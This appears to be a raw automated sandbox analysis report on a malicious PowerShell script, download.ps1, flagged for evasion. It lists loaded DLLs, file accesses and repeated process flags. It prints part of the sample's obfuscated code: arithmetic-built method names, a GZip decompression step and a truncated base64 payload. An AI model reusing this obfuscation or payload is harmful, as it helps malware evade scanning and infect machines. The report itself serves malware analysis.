u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
Source: classification engineClassification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4hiezmo.bgf.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ygi8e15xtdl6k2c.((-join (@((6829-6762),(86691/(5492-(13082447/2777))),(-4549+4661),(877855/(3417+(5722458/1491))),(-3224+3308),(-5216+5327))| ForEach-Object { [char]$_ })))( $fxb4tonc1di39mu ) $ygi8e15xtdl6k2c.(([system.String]::new(@((219023/(21722505/6645)),(891540/8255),(-6561+(64424832/(21774280/2255))),(-5726+5841),(4886-(8169-3384))))))()$5teju2orbwapdgq.(([char[]]@((7253-(11996-(12431-(59001782/7742)))),(-5740+(11936-(5419+(1103850/1650)))),(594849/(-3209+8568)),(-1852+(10186-(10384-2165))),(2284-2183)) -join ''))()[byte[]] $anxc5tg2wm9u86b = $fxb4tonc1di39mu.(([char[]]@((-6992+7076),(-141+(167328/(1171296/1764))),(-3238+(-1990+(52125464/(10090-242)))),(384408/3372),(838698/(-1153+(14176-5666))),(864561/8913),(-7252+(288+7085))) -join ''))() $atq3ip6evlnohyk=$anxc5tg2wm9u86b return $atq3ip6evlnohyk}[System.Text.Encoding]::ascii.(([char[]]@((335049/(7727-(10627264/3533))),(-7915+8016),(-10011+10127),(335-252),(-5939+(1234+4821)),(466-(2345376/6663)),(7803-7698),(174130/1583),(-4207+4310)) -join ''))((hz1cnubfqdw7jvkyo3gs6xi5m0e "ZuB6aWpjN3VgYtnrIgRuPhikqFYkvRUQSdBBAN2Z61py5nCoHZjmNEod//ZFZmBF6wM5zSbyoZGvFbufJsz1e0+yhWPldS7iSrgPk/bJyNDOhJrtwp2tuLmE0Prq/QvDBpCKhZ6q/NJb3c0IjYsalgwcRQAdGAoGCxUE0BUQToqMGguBhYGH6occ2VqDnQ6J7phlRsVNwGK7PGovJ9aotLEd3UeT1KvtRVDMkYSC9Aq/DMfbFyXPjbe07GMY/+8H7PQxxBS9zZUZ+A9aB6ytj44wqyesK8uUL6DmEuGZ8uI+RSsbmvxgCx8NHqRdHP9eHUWWEak/XPzeMr1RtU4LFP44+ylI2EAdRDw61fq4+atyGOs7CSod4qtOaUrxeJYswaIc3vPcCEpZuYiJtlebHsW9ic+43cyHlI63gLOwsKoYEcIPxL5xf3TpHJKm1yjGgqRO/PEfHy8EScWVy9u2P7bfekSD9q7C5BCfRaPGI5JJbSfXFJirpk81GhoDKegTNBX4RICidLpFW0ppE+cO3b2znTqvVBBu25txwoT2KM+XF8kyGdSViQawUMPzKUIty5xM/7AAqvdyrFLE6Qdf+nTCoBx/KRuDz61ujwcHTuSJgELBg7cvicsxPOCXbx0HxI2eKw/6nkNJGHrONFqarqag+0wwzYOtz8ppB7e/Ixkls9PSXmXbjfQo5Pa9bAPeQRgldDLJvXTS59d+FSD/tJHSGljwvqiiKxwRBLfWYwF8pmSrJxjuC6Md20A1eFKG1uYtC4t0bDMCGd6j3mHFjC756Zo5zGiZu1IUstY1G2X/+S/bb7rPfXQC3shg6Y0on6uU5BeMtgiLJ6MXVvZPKOYCHQgg8xu1EtzpGrt0Wh0Qgcq5POmnLBHL6qhfzSrvJ/VOsnQ+aSmJFcusxJg91sYajOyTXRqcttQfF1MZRIecmcenRjZvJmVVbHfnqqBOU2h6+/o6dlrROnABDqXsjkMuxudzvQempH38WJCNbyXKWIKL4ixlkol82RoamYS2IoY7HDks/obdKIr/LaPs4Y+aoJf/YJOTvHpJV9tEPfAJjto2/D99U60a7C830MXhxhiFyk2k+CoZgM15IMvXeApegmO8P8JIPPVHGFwQ/6u/AY6k8BbEyrff/Bpi/I+n1jVMEJYDXLWcXVs+hpWakpeq0hOXCzRsQUnK8TGpU89j/0yYSRv9YZgwEMNpzRY+lTqFp42JoFjvRuhL/rjQbiohmdBQn5oDV/IPGYN5GR+VE95Kbg5siSpFJOXg13XqGd5VK6ZG8kBrrhcH2wC8DbCjV9cmizuQc0CK2tgD+uVyZn71+bwHaKDK8m0jtCOSR/yYhNCDMjT3ZQB7DBcQxApXnINlFlL6QlwdR/0gUU/hOaA53QfTlIGFmJJznQUMiwcsHp30ukSvodePpJfEsreDLhWs18pEptFkiQh33Z5FWATbYi98clLOsbzg3uw4cg8vLXPDYXEfU/VRzHIsmTDgIQ1J1Cb6C/sO33Yvvn5AgiNbXjRJTnxoZ3u7T13UExxmWuopNomvlHN4G41fp/r+75LhDDM1W9uv+I3tE3KzqOgBEJdWzW8YJPKNo/RghFOeHraXGc+kLKKbfNywWQI237L9cEcjUkBLXFwJXZWranP+S9lfS/9yutgzFHk8ye5jzflyHXnRljWkSX+rIOYFmlgjOrfzCQgRMQwFqmOoz17fn3GIvQl6n2wmlfAxtE8vI2je/eflj6IsnuLxkRWTBHV3n+bLVE5YIkg4JCbifA5qePTHV+K+mKRnT9BAr6ltNGxLxH0govfdaFhYjNJYHuKJYvWBL3yApRRgPaznwAdZ9yxmpNP77enO0e+Cx73pxNbxbjX4n2HimcvmAVOWMoG
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 13%
Source: download.ps1ReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2245289656.00000197D0625000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt source: powershell.exe, 00000000.00000002.2209370922.00000197B8156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tion.pdbes]p8 source: powershell.exe, 00000000.00000002.2209370922.00000197B80C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2209370922.00000197B80EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbK source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848E1D2A5 pushad ; iretd 0_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F3792B push ebx; retf 0_2_00007FF848F3796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F3B183 push ebx; retn 002Ah0_2_00007FF848F3B18A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F3AE8D push ebx; retn 0022h0_2_00007FF848F3AE9A

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
